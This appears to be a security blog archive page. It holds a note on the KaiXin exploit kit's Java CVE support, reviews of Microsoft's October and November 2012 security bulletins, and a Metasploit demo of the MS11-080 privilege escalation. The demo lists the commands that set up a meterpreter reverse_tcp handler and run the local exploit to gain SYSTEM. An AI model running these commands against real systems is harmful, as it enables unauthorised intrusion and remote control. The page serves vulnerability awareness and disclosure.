Tag Archives: Microsoft

KaiXin Exploit Kit Evolutions

Beginning August, Kahu Security discovered a new Chinese named KaiXin EK (Exploit Kit). This exploit kit was using, like his brother in blood Gong Da (Gondad) EK, javascript obfuscation “Yszz vip“.

The August version of KaiXin was supporting:

November version of KaiXin has involve by removing support of Oracle Java CVE-2012-0507 and CVE-2012-0754 vulnerabilities, and adding support of Oracle Java CVE-2012-1723 (fixed in Jun 2012 CPU), of Oracle Java CVE-2012-4681 (fixed in End August Oracle Security Alert) and of Oracle Java CVE-2012-5076 (fixed in October 2012 CPU).

Here under a VirusTotal analysis of all involved files:

The following diagram describe you the way November version of KaiXin EK is working.

 

Microsoft November 2012 Patch Tuesday Review

Microsoft has release, the 13 November 2012, during his November Patch Tuesday, two updated security advisories and six security bulletins. On the six security bulletins four of them has a Critical security rating.

Microsoft Security Advisory 2269637

MSA-2269637, released during August 2010, has been updated. The security advisory is regarding “Insecure Library Loading” and the update has add the reference to MS12-074 “Vulnerabilities in .NET Framework Could Allow Remote Code Execution“.

Microsoft Security Advisory 2749655

MSA-2749655, release during October 2012, has been updated. The security advisory is regarding “Compatibility Issues Affecting Signed Microsoft Binaries” and the update has modify the reference to KBs of “Microsoft Office 2003 Service Pack 3” updates.

MS12-071 – Cumulative Security Update for Internet Explorer

MS12-071 security update, classified as Critical, allowing remote code execution, is the fix for three privately reported vulnerabilities. CVE-2012-1538 has a 9.3 CVSS base score and was discovered and privately reported by Jose A. Vazquez of spa-s3c.blogspot.com, working with VeriSign iDefense LabsCVE-2012-1539 has a 10.0 CVSS base score and was discovered and privately reported by Jose A. Vazquez of spa-s3c.blogspot.com, working with VeriSign iDefense LabsCVE-2012-4775 has a 9.3 CVSS base score and was discovered and privately reported by Cheng-da Tsai (Orange), Sung-ting Tsai, and Ming-chieh Pan (Nanika) of Trend Micro.

Affected software is:

  • Internet Explorer 9

MS12-072 – Vulnerabilities in Windows Shell Could Allow Remote Code Execution

MS12-072 security update, classified as Critical, allowing remote code execution, is fixing two privately reported vulnerabilities. CVE-2012-1527 has a 9.3 CVSS base score and was discovered and privately reported by Tal Zeltzer, working with VeriSign iDefense LabsCVE-2012-1528 has a 9.3 CVSS base score and was discovered and privately reported by Tal Zeltzer, working with VeriSign iDefense Labs.

Affected softwares are:

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for 64-bit Systems
  • Windows Server 2012

MS12-074 – Vulnerabilities in .NET Framework Could Allow Remote Code Execution

MS12-074 security update, classified as Critical, allowing remote code execution, is fixing five privately vulnerabilities. CVE-2012-1895 has a 9.3 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security. CVE-2012-1896 has a 5.0 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security. CVE-2012-2519 has a 7.9 CVSS base score and was discovered and privately reported. CVE-2012-4776 has a 9.3 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security. CVE-2012-4777 has a 9.3 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security.

Affected softwares are:

  • Microsoft .NET Framework 1.1 Service Pack 1
  • Microsoft .NET Framework 1.0 Service Pack 3
  • Microsoft .NET Framework 2.0 Service Pack 2
  • Microsoft .NET Framework 1.1
  • Microsoft .NET Framework 3.5
  • Microsoft .NET Framework 3.5.1
  • Microsoft .NET Framework 4
  • Microsoft .NET Framework 4.5

MS12-075 – Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution

MS12-075 security update, classified as Important, allowing remote code execution, is fixing three privately reported vulnerabilities. CVE-2012-2530 has a 7.2 CVSS base score and was discovered and privately reported. CVE-2012-2553 has a 7.2 CVSS base score and was discovered and privately reported by Matthew Jurczyk of Google IncCVE-2012-2897 has a 10.0 CVSS base score and was discovered and privately reported by Eetu Luodemaa and Joni Vähämäki of Documill, working with the Chromium Security Rewards Program.

Affected softwares are:

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for 64-bit Systems
  • Windows Server 2012

MS12-076 – Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution

MS12-076 security update, classified as Important, allowing remote code execution, is fixing four privately reported vulnerabilities. CVE-2012-1885 has a 9.3 CVSS base score and was discovered and privately reported by Sean Larsson, working with the iDefense VCPCVE-2012-1886 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with the iDefense VCPCVE-2012-1887 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with the iDefense VCPCVE-2012-2543 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with HP TippingPoint’s Zero Day Initiative.

Affected softwares are:

  • Microsoft Office 2003 Service Pack 3
  • Microsoft Office 2007 Service Pack 2
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 1 (32-bit editions)
  • Microsoft Office 2010 Service Pack 1 (64-bit editions)
  • Microsoft Office 2008 for Mac
  • Microsoft Office for Mac 2011
  • Microsoft Excel Viewer
  • Microsoft Office Compatibility Pack Service Pack 2
  • Microsoft Office Compatibility Pack Service Pack 3

MS12-073- Vulnerability in Kerberos Could Allow Denial of Service

MS12-073 security update, classified as Moderate, allowing information disclosure, is fixing two vulnerabilities. CVE-2012-2531 has a 2.1 CVSS base score and was discovered and privately reported by Justin Royce of ProDX. CVE-2012-2532 has a 5.0 CVSS base score and was discovered and publicly reported.

Affected softwares are:

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Microsoft October 2012 Patch Tuesday Review

Microsoft has release, the 9 October 2012, during his October Patch Tuesday, one new security advisory, two security advisories updates and nine security bulletins. On the seven security bulletins one of them has a Critical security rating.

Microsoft Security Advisory 2661254

MSA-2661254, released during the Microsoft August 2012 Patch Tuesday, has been updated. This security advisory is the suite of the Flame malware attacks consequences. This MSA, as planned and announced, is pushed as a security update through KB2661254.

Microsoft Security Advisory 2737111

MSA-2737111, release during the Microsoft August 2012 Patch Tuesday, has been updated. The update reflect publication of MS12-067 for Microsoft FAST Search Server 2010 for SharePoint.

Microsoft Security Advisory 2749655

MSA-2749655 is concerning an issue involving specific digital certificates that were generated by Microsoft without proper timestamp attributes. This could cause compatibility issues between affected binaries and Microsoft Windows.

MS12-064 – Vulnerabilities in Microsoft Word Could Allow Remote Code Execution

MS12-064 security update, classified as Critical, allowing remote code execution, is the fix for two privately reported vulnerabilities. CVE-2012-0182 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with TippingPoint’s Zero Day InitiativeCVE-2012-2528 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with Beyond Security’s SecuriTeam Secure Disclosure program.

Affected softwares are:

  • Microsoft Office 2003 Service Pack 3
  • Microsoft Office 2007 Service Pack 2 & Service Pack 3
  • Microsoft Office 2010 Service Pack 1 (32-bit and 64-bit editions)
  • Microsoft Word Viewer 
  • Microsoft Office Compatibility Pack Service Pack 2 & Service Pack 3

MS12-065 – Vulnerability in Microsoft Works Could Allow Remote Code Execution

MS12-065 security update, classified as Important, allowing remote code execution, is fixing one vulnerability CVE-2012-2550. This vulnerability has a 9.3 CVSS base score and was discovered and privately reported by an unknown security researcher.

Affected software is:

  • Microsoft Works 9

MS12-066 – Vulnerability in HTML Sanitization Component Could Allow Elevation of Privilege

MS12-066 security update, classified as Important, allowing elevation of privilege, is fixing one vulnerability CVE-2012-2520. This vulnerability has a 4.3 CVSS base score and was discovered exploited in the wild by Drew Hintz of Google Security Team.

Affected softwares are:

  • Microsoft InfoPath 2007 Service Pack 2 & Service Pack 3
  • Microsoft InfoPath 2010 Service Pack 1 (32-bit & 64-bit editions)
  • Microsoft Communicator 2007 R2
  • Microsoft Lync 2010 (32-bit & 64-bit)
  • Microsoft Lync 2010 Attendee
  • Microsoft SharePoint Server 2007 Service Pack 2 & Service Pack 3 (32-bit & 64-bit editions)
  • Microsoft SharePoint Server 2010 Service Pack 1
  • Microsoft Groove Server 2010 Service Pack 1
  • Microsoft Windows SharePoint Services 3.0 Service Pack 2 (32-bit & 64-bit version)
  • Microsoft SharePoint Foundation 2010 Service Pack 1 
  • Microsoft Office Web Apps 2010 Service Pack 1

MS12-067 – Vulnerabilities in FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution

MS12-067 security update, classified as Important, allowing remote execution, is fixing multiple vulnerabilities also fixed in MS12-058 during Microsoft August 2012 Patch Tuesday.

MS12-068 – Vulnerability in Windows Kernel Could Allow Elevation of Privilege

MS12-068 security update, classified as Important, allowing elevation of privilege, is fixing one vulnerability CVE-2012-2529. This vulnerability has a 6.9 CVSS base score and was discovered and privately reported by an anonymous researcher, working with VeriSign iDefense Labs.

Affected softwares are:

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

MS12-069 – Vulnerability in Kerberos Could Allow Denial of Service

MS12-069 security update, classified as Important, allowing denial of service, is fixing one vulnerability CVE-2012-2551. This vulnerability has a 5.0 CVSS base score and was discovered and privately reported by an unknown security researcher.

Affected softwares are:

  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

MS12-070 – Vulnerability in SQL Server Could Allow Elevation of Privilege

MS12-070 security update, classified as Important, allowing elevation of privilege, is fixing one vulnerability CVE-2012-2552. This vulnerability has a 4.3 CVSS base score and was discovered and privately reported by an unknown security researcher.

Affected softwares are:

  • Microsoft SQL Server 2000 Reporting Services Service Pack 2
  • Microsoft SQL Server 2005 Express Edition with Advanced Services Service Pack 4
  • Microsoft SQL Server 2005 for 32-bit Systems Service Pack 4
  • Microsoft SQL Server 2005 for x64-based Systems Service Pack 4
  • Microsoft SQL Server 2008 for 32-bit Systems Service Pack 2
  • Microsoft SQL Server 2008 for 32-bit Systems Service Pack 3
  • Microsoft SQL Server 2008 for x64-based Systems Service Pack 2
  • Microsoft SQL Server 2008 for x64-based Systems Service Pack 3
  • Microsoft SQL Server 2008 R2 for 32-bit Systems Service Pack 1
  • Microsoft SQL Server 2008 R2 for x64-based Systems Service Pack 1
  • Microsoft SQL Server 2012 for 32-bit Systems
  • Microsoft SQL Server 2012 for x64-based Systems

MS11-080 Microsoft Windows AfdJoinLeaf Privilege Escalation Metasploit Demo

Timeline :

Vulnerability reported to Microsoft by Bo Zhou
Coordinated public release of the vulnerability the 2011-10-11
Metasploit PoC provided the 2012-10-02

PoC provided by :

Bo Zhou
Matteo Memelli
Spencer McIntyre

Reference(s) :

MS11-080
CVE-2011-2005

Affected version(s) :

Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2

Tested on Windows XP Pro SP3 with :

N/A

Description :

This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring it’s own token to avoid causing system instability.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j

session -i 1
getuid
sysinfo
background

use exploit/windows/local/ms11_080_afdjoinleaf
set SESSION 1
exploit

session -i 2
sysinfo
getuid